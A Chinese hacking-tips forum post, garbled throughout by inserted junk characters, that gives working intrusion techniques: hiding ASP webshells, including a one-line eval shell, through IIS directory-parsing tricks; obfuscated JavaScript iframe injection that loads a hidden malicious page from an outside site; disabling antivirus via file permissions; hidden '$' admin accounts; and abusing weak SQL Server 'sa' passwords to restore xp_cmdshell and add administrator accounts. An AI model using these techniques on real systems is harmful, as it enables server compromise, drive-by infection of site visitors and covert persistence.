* W' R7 [8 u6 l3 _0 Y& e& Z+ e; u: i* n0 ?. h0 i9 S
53、隐藏ASP后门的两种方法
% W- B% I& z8 r- s; g+ |* H8 s1、建立非标准目录:mkdir images..\$ p5 l( a$ A9 f7 [! Y
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
% r5 E/ C+ z" {& e( O) |/ i通过web访问ASP木马:http://ip/images../news.asp?action=login
. I% j ? t3 N如何删除非标准目录:rmdir images..\ /s
, X/ s4 @. { y) B) u4 E) w2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:# x2 H _: g; _ l6 G7 |. ]# F
mkdir programme.asp" \& Z* K9 C0 y5 }4 B5 a" H2 r
新建1.txt文件内容:<!--#include file=”12.jpg”-->
8 E: C4 o* `. n- n. Y [新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件 T! j1 ]' b4 T: N: O
attrib +H +S programme.asp
! `0 {* E1 B a" N通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, q( g7 ]9 p6 c1 K+ W4 U* m3 i8 o6 s" G/ s" s2 w# c
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
2 H, B! e) D) W4 H. j+ L然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。, n9 B" A$ I' m h9 F) X
Y1 N2 [4 M$ r8 b; \: I' A55、JS隐蔽挂马8 m- T6 N3 `% J/ E# c+ L+ ?
1.
+ K/ e( N3 `% S) b' V5 Xvar tr4c3="<iframe src=ht";
y2 u4 Y0 T5 N2 }6 B$ C& `& Qtr4c3 = tr4c3+"tp:/";
G1 a: R! }. Z/ U% h' {7 itr4c3 = tr4c3+"/ww";
+ o3 D8 W6 w6 V/ u8 A4 `tr4c3 = tr4c3+"w.tr4";
2 l) a3 E, V/ a3 ^3 M+ a# L. Y7 Ftr4c3 = tr4c3+"c3.com/inc/m";7 P; z$ O& Z* @# \; \9 ^9 h6 y8 U
tr4c3 = tr4c3+"m.htm style="display:none"></i";
. ~$ }- _( E1 ~2 ]- q7 Ltr4c3 =tr4c3+"frame>'";
1 K& |8 G( j/ q: I8 C+ zdocument.write(tr4c3); l4 _. g6 n- O K. N7 \9 ]
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。1 k g7 A( P# z. H& M% a
7 V5 W. G' K7 ?" T" n/ r1 X
2.
# _7 ]% `6 w. A6 X转换进制,然后用EVAL执行。如- d: M# Q' ~6 [* c' y
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");" }0 o. H* C, c1 Q: N. T
不过这个有点显眼。; V; I4 N# \& X1 O. Q) J
3.: Y6 |9 [" j' ?
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
4 V6 c! d; m4 _0 ]. r最后一点,别忘了把文件的时间也修改下。0 } L8 Z4 W! D) E' J6 p
: J6 C9 C4 l% ~, [: V' J5 C
56.3389终端入侵常用DOS命令; U( w$ s4 k! K, ^. i+ M* x
taskkill taskkill /PID 1248 /t3 u" V5 x1 |- e: k- n9 F/ R& l
8 Z+ l4 R8 v1 O1 [+ O. @tasklist 查进程
; Q4 p; p! g6 z. Z4 }
" g! W: q% \0 h7 g2 l0 r% y. o' ocacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限# u. Y5 U% } _9 [
iisreset /reboot& Q: k, k* r: c4 s. e
tsshutdn /reboot /delay:1 重起服务器7 h6 J3 y; t0 w0 H1 |
8 P% p8 j9 e0 H) rlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
5 n8 V* F: }. T8 f! M/ S! X0 \0 M
5 F5 P# C* p# J' ]query user 查看当前终端用户在线情况2 R% @ F3 L% ^, `/ ?4 ^& M
9 ?* r) v) w" a+ N2 V
要显示有关所有会话使用的进程的信息,请键入:query process *$ L4 U! ~; T% u" @
. j, x/ C; w% ^3 o
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:26 B7 \- S4 I; S; p& t) I0 w% f
. V3 [" w, J$ I- S+ M* j
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
! M/ a: o- c: @- w( e9 L2 a) ]: i7 j; k) f) K3 f
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM025 w! h. H8 p3 L. F: O
+ w s4 }8 Z$ r' r% W
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启, C( b# V2 }! _
2 z7 t" G R. u9 s/ t
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
* n4 J1 b. i' K! w f: C- ^1 y
2 S5 G W$ t X* [: j命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
# h- I' l3 R! z& K8 R
1 O0 |, m6 D' Z( u命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
& }% v p$ J* ]4 Z
( A4 {: s7 w7 d/ V" {56、在地址栏或按Ctrl+O,输入:
- h! I" j- @% [' g' I2 i# Xjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;" Q( X: ?, v* T! T8 B3 j& q9 X
' I7 o+ }' |/ j4 ~$ U
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。$ f0 B0 N; ^# D! f" O0 m" [4 `
. o/ f1 K0 ~( J9 v, C: F, ?
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
0 z, D7 h/ D; x& a用net localgroup administrators是可以看到管理组下,加了$的用户的。* J* q( [9 O% U; y% e5 L/ c: O
) A' m$ }* d# V, Y; U
58、 sa弱口令相关命令
" D0 U7 Y6 p, b; M0 x k" g( ?9 E. F8 D( E
一.更改sa口令方法:! x8 U6 h( \# N& `
用sql综合利用工具连接后,执行命令:
% C) j2 A' k& B) K R( v8 vexec sp_password NULL,'20001001','sa'. L7 m- N: O' U( X, ~) k6 t. G
(提示:慎用!)
. g, m$ k6 {7 J4 Z$ Z, U k% U; w& g6 n0 z5 g
二.简单修补sa弱口令.
# U- @; H. n; Q" d4 S! G6 L! } f, w' g3 P6 R. I
方法1:查询分离器连接后执行:
3 t5 }* ?3 V+ G2 W" Iif exists (select * from0 J! @' u- ^& V6 Q3 K
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
% b& a' g" X- X" e& ^+ v/ x+ n0 pOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) m" l( ~! W& s; _+ n8 z3 Q# p8 E+ }7 e
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
3 B+ Y: i! \8 s5 j# x+ n2 L
! q/ n& t! f& ]0 y$ wGO
& A' C0 w `. }! v& b
6 L ?+ R* c1 V5 ]! X O9 k% B然后按F5键命令执行完毕
0 K# f9 E2 w1 F9 Z* O/ h7 v, h, a8 K
# Q* z5 A2 q7 {7 J方法2:查询分离器连接后
/ t4 q+ h9 A$ x- J9 z9 k% [( q第一步执行:use master5 G f$ H8 k P2 v% d
第二步执行:sp_dropextendedproc 'xp_cmdshell'/ h L- u3 s; t
然后按F5键命令执行完毕
, J1 R0 B+ k7 Q- T) u
! n+ i4 U- g! N2 |+ I' H% v% |. ^
; @9 x! L# Y1 {' R, C& {6 f8 `三.常见情况恢复执行xp_cmdshell.9 C; |7 P; }8 p6 I4 c& \+ t
8 D6 k# A4 K3 n& R6 B; Y
3 A/ G) S# K/ U2 d9 O
1 未能找到存储过程'master..xpcmdshell'.
4 Y m; o9 Q$ j ` 恢复方法:查询分离器连接后,
3 l+ Y5 i8 Q1 [* m4 I5 Y. Q6 ]第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int# W3 ?& {! r p: H5 f6 f
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 Z$ |- q# g# T3 F2 t. s t然后按F5键命令执行完毕
( @6 g, s n! w
5 G/ D( j6 F+ X" F# ~3 k1 \* M2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)( m, R! E( F& s* h+ T
恢复方法:查询分离器连接后,
2 `5 W6 Q4 r% s第一步执行:sp_dropextendedproc "xp_cmdshell"
, W2 U$ K# r3 [5 ]' z4 D/ s' o A第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, e& x4 [5 _& f$ I9 Y8 e然后按F5键命令执行完毕
; F: \4 d( x0 p0 `2 r+ y, `! S8 u ^$ E7 k0 ]
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。), c' k# y/ x/ \
恢复方法:查询分离器连接后,8 B( z5 Z8 }7 z: Q! g
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
3 \1 j4 g8 l. h* n1 o# d1 O9 p9 W第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
' |/ e# @. i6 N然后按F5键命令执行完毕) t8 s% G- V( i+ N
* M/ S) Z3 o! C8 {0 h
四.终极方法.: W9 s( `* J( q. y
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
5 Z: V( |7 O7 q1 w ] d. `查询分离器连接后,* q/ |* R4 P9 n/ a+ z& Q6 x7 T9 J
2000servser系统:4 y; M4 P9 D. W" H! n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 X! z2 z# E h7 e* t9 N' ~2 {; s3 `
, D3 N3 T' \3 F. C8 [' E0 T- jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* N j* E9 k' Z! Y0 V( q; [$ }" ~. X% x+ _* h7 |
xp或2003server系统:
u! E0 U j, B) k4 M0 j- e7 h% C. r. ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'( c" V! {: J- y) l$ R, e
' T: w! u9 P( w6 D- Y6 z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
6 O3 N' c2 J3 h. q8 n5 S |
发表于 2012-9-15 14:13:15
收藏
支持
反对